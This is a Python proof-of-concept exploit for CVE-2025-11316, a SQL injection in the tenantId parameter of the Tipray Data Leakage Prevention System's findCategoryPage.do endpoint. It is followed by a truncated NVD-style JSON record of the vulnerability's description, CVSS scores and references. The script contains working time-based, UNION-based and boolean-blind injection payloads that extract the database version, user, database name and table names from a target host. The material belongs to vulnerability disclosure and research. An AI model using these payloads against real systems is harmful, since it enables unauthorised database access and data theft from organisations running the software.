CVE-2025-11316

# CVE-2025-11316 - Tipray Data Leakage Prevention System SQL Injection PoC # Vulnerability: SQL Injection in findCategoryPage.do via tenantId parameter # Author: Security Researcher # Reference: https://github.com/FightingLzn9/vul import requests import sys import time TARGET_URL = "http://target-host:8080" VULNERABLE_ENDPOINT = "/findCategoryPage.do" def check_vulnerability(base_url): """Check if the target is vulnerable to SQL injection""" url = base_url + VULNERABLE_ENDPOINT # Normal request normal_payload = { "tenantId": "1" } # Malicious payload - basic SQL injection test malicious_payload = { "tenantId": "1' OR '1'='1" } # Time-based blind injection payload time_based_payload = { "tenantId": "1' AND SLEEP(3)-- " } try: # Test normal request start_time = time.time() normal_resp = requests.post(url, data=normal_payload, timeout=10) normal_time = time.time() - start_time # Test time-based injection start_time = time.time() malicious_resp = requests.post(url, data=time_based_payload, timeout=10) malicious_time = time.time() - start_time # If response time is significantly longer, likely vulnerable if malicious_time - normal_time >= 2: print(f"[+] Target appears vulnerable! Response delay: {malicious_time - normal_time:.2f}s") return True else: print(f"[-] Target may not be vulnerable. Response delay: {malicious_time - normal_time:.2f}s") return False except Exception as e: print(f"[!] Error: {e}") return False def exploit_union_injection(base_url): """Exploit using UNION-based SQL injection to extract data""" url = base_url + VULNERABLE_ENDPOINT # UNION-based injection to extract database version payloads = [ # Extract database version {"tenantId": "1' UNION SELECT 1,version(),3-- "}, # Extract current database {"tenantId": "1' UNION SELECT 1,database(),3-- "}, # Extract current user {"tenantId": "1' UNION SELECT 1,user(),3-- "}, # Extract table names from information_schema {"tenantId": "1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- "}, ] for payload in payloads: try: resp = requests.post(url, data=payload, timeout=10) print(f"[+] Payload: {payload['tenantId']}") print(f"[+] Response: {resp.text[:500]}") print("-" * 60) except Exception as e: print(f"[!] Error: {e}") def exploit_boolean_blind(base_url): """Exploit using boolean-based blind SQL injection""" url = base_url + VULNERABLE_ENDPOINT # Test boolean conditions true_payload = {"tenantId": "1' AND 1=1-- "} false_payload = {"tenantId": "1' AND 1=2-- "} try: true_resp = requests.post(url, data=true_payload, timeout=10) false_resp = requests.post(url, data=false_payload, timeout=10) if true_resp.text != false_resp.text: print("[+] Boolean-based blind injection confirmed!") print(f"[+] True condition response length: {len(true_resp.text)}") print(f"[+] False condition response length: {len(false_resp.text)}") return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET_URL print(f"[*] Testing CVE-2025-11316 against: {target}") print("=" * 60) if check_vulnerability(target): print("\n[*] Attempting UNION-based exploitation...") exploit_union_injection(target) print("\n[*] Attempting boolean-based blind exploitation...") exploit_boolean_blind(target) else: print("[-] Target does not appear vulnerable")

{"cve": {"id": "CVE-2025-11316", "sourceIdentifier": "[email protected]", "published": "2025-10-06T03:15:32.003", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tipray 厦门天锐科技股份有限公司 Data Leakage Prevention System 天锐数据泄露防护系统 1.0. Affected by this issue is the function findCategoryPage of the file findCategoryPage.do. Executing manipulation of the argument tenantId can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tipray:data_leakage_prevention_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "25FED908-237A-432E-9605-57E982321BD3"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-8.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327197", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327197", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.663506", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/FightingLzn9/vul/blob/main/%E5%A4%A9%E9%94%90%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2%E9%98%B2%E6%8A%A4%E7%B3%BB%E7%BB%9F-8.md", "source": "134c70 ... (truncated)